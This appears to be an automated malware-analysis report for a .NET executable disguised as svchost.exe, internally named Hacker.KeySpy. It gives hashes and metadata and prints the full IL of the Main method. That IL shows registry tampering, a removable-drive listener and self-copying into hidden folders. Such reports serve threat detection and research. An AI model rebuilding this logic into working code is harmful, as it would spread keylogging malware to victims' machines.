Suspicious
Suspect

f16b392a7cf3c359c8217504153c94f1

PE Executable | MD5: f16b392a7cf3c359c8217504153c94f1 | Size: 65.55 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
Hash Value
MD5
f16b392a7cf3c359c8217504153c94f1
Sha1
2486f223df371ab66edb21c5267db959fa7f33ed
Sha256
c4bec9968970bbc9086dd0f846472cb6aca12e3b1d5beff43237e956b8b52116
Sha384
a5bc76e7176181f21be4b2489942968b5edd57bd56f0d174575983068f50ec473d8b79857c2fc8fd304336f20883ace6
Sha512
c7a8e715151addca8177b92f8a13a6487d3567c3497d9d416bfd8838803898ef725e079b1d232a6d3ee0e8e18ca792aedd3f1ff7f728f29b2f0b915071d8c6da
SSDeep
768:5NjuxqnTooRN0RneUD86Mw8KL0HpFBv8s3i6E5nXfUWPYfIc/Qi3qEBQp:5Njum7Ynydw8KwHpF73i6EBXlLOUp
TLSH
B6535C09B3DD8662C47E1679445297104330FC366E0BDB872ED1B4AF2C663928B72B5F

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
.Net Resources
Hacker.KeySpy.Controls.DriveListener.resources
Information
Name
Value
Info

PE Detect: PeReader FAIL, AsmResolver Mapped OK

Info

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_92839511.exe

Module Name

svchost.exe

Full Name

svchost.exe

EntryPoint

System.Int32 Hacker.KeySpy.Program::Main(System.String[])

Scope Name

svchost.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v2.0.50727

Tables Header Version

512

WinMD Version

<null>

Assembly Name

svchost

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

77

Main Method

System.Int32 Hacker.KeySpy.Program::Main(System.String[])

Main IL Instruction Count

283

Main IL

nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> ldc.i4.1 <null> ldstr APName ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr Hidden ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) ldstr HideFileExt ldc.i4.1 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) nop <null> ldc.i4.2 <null> newobj System.Void Hacker.KeySpy.Controls.DriveListener::.ctor(System.IO.DriveType) stloc.2 <null> ldloc.2 <null> ldnull <null> ldftn System.Void Hacker.KeySpy.Program::flashDriveListener_DriveExists(System.Object,Hacker.KeySpy.Controls.DriveExistsEventArgs) newobj System.Void Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void Hacker.KeySpy.Controls.DriveListener::add_DriveExists(Hacker.KeySpy.Controls.DriveListener/DriveExistsEventHandler) nop <null> ldloc.2 <null> callvirt System.Void Hacker.KeySpy.Controls.DriveListener::Start() nop <null> ldsfld System.IO.DriveInfo Hacker.KeySpy.Program::progDrive callvirt System.IO.DriveType System.IO.DriveInfo::get_DriveType() ldc.i4.3 <null> ceq <null> ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_00C4: nop nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 
brtrue.s IL_00B1: newobj System.Void Hacker.KeySpy.MainContext::.ctor() nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop newobj System.Void Hacker.KeySpy.MainContext::.ctor() stloc.3 <null> ldloc.3 <null> call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.ApplicationContext) nop <null> nop <null> br IL_02C0: ldc.i4.0 nop <null> ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Boolean System.IO.Directory::Exists(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0130: ldloc.1 nop <null> ldstr explorer.exe ldsfld System.IO.DirectoryInfo Hacker.KeySpy.Program::progDir callvirt System.String System.IO.FileSystemInfo::get_FullName() ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile callvirt System.String System.IO.FileSystemInfo::get_Name() ldstr .exe ldstr callvirt System.String System.String::Replace(System.String,System.String) call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String,System.String) pop <null> nop <null> ldloc.1 <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0151: ldnull nop <null> ldsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex callvirt System.Void System.Threading.WaitHandle::Close() nop <null> ldnull <null> stsfld System.Threading.Mutex Hacker.KeySpy.Program::appMutex ldc.i4.0 <null> stloc.s V_5 leave IL_02F9: nop 
ldnull <null> stloc.s V_4 nop <null> ldc.i4.s 37 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_01B6: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01A5: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_01FE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_01DD: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void 
System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave IL_02B1: nop pop <null> nop <null> ldc.i4.5 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr /Important/svchost.exe call System.String System.String::Concat(System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.Boolean System.IO.FileSystemInfo::get_Exists() ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_0266: nop nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 call System.Boolean Hacker.KeySpy.Other::FileCompare(System.IO.FileInfo,System.IO.FileInfo) stloc.s V_6 ldloc.s V_6 brtrue.s IL_0255: ldloc.s V_4 nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() ldc.i4.1 <null> callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String,System.Boolean) pop <null> nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> br.s IL_02AE: nop nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Boolean System.IO.Directory::Exists(System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_028D: ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile nop <null> ldloc.s V_4 callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.Void System.IO.DirectoryInfo::Create() nop <null> nop <null> ldsfld System.IO.FileInfo Hacker.KeySpy.Program::progFile ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() callvirt System.IO.FileInfo System.IO.FileInfo::CopyTo(System.String) pop <null> ldloc.s V_4 
callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() ldc.i4.2 <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) nop <null> nop <null> nop <null> leave.s IL_02B1: nop nop <null> ldloc.s V_4 callvirt System.String System.IO.FileSystemInfo::get_FullName() call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> nop <null> ldc.i4.0 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop pop <null> nop <null> ldc.i4.m1 <null> stloc.0 <null> nop <null> leave.s IL_02CC: nop nop <null> leave.s IL_02F3: nop nop <null> ldloc.0 <null> call System.Boolean System.Convert::ToBoolean(System.Int32) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldloc.s V_6 brtrue.s IL_02E9: nop nop <null> call System.Void System.Windows.Forms.Application::Restart() nop <null> nop <null> br.s IL_02F1: nop nop <null> call System.Void System.Windows.Forms.Application::Exit() nop <null> nop <null> nop <null> endfinally <null> nop <null> ldloc.0 <null> stloc.s V_5 br.s IL_02F9: nop nop <null> ldloc.s V_5 ret <null>

Artefacts
Name
Value
PE Layout

MemoryMapped (process dump suspected)

Characteristics
No malware configuration was found at this point.
Artefacts
Name
Value Location
PE Layout

MemoryMapped (process dump suspected)

f16b392a7cf3c359c8217504153c94f1

PE Layout

MemoryMapped (process dump suspected)

f16b392a7cf3c359c8217504153c94f1 > [Rebuild from dump]_92839511.exe
